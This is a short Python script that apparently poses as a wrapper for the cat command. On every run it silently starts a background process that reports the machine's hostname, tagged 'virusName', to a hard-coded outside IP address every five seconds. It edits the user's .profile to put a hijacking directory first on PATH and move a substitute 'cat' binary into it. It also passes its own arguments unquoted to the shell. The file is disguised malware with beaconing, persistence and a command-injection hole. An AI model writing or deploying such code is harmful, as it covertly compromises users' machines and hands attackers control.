#!/usr/bin/python
import getpass
import os
import sys
import threading
import time
import requests
import socket


code = """
import socket
import time
import requests
while True:
	requests.get('http://44.44.127.118:8080/api/submit?id=%s&virusName=1' % socket.gethostname())
	time.sleep(5)"""

os.system('python -c "%s" &' % code)


command = "/bin/cat " + " ".join(sys.argv[1:])
os.system(command)

with open('/%s/.profile' % getpass.getuser(), 'a+') as f:
	lines = f.readlines()
	if 'PATH="/%s/.rbenv/bin:$PATH"\n' not in lines:
		f.write('PATH="/%s/.rbenv/bin:$PATH"\n' % getpass.getuser())
	if 'mv /bin/bucket/cat /%s/.rbenv/bin\n' % getpass.getuser() not in lines:
		f.write('mv /bin/bucket/cat /%s/.rbenv/bin\n' % getpass.getuser())
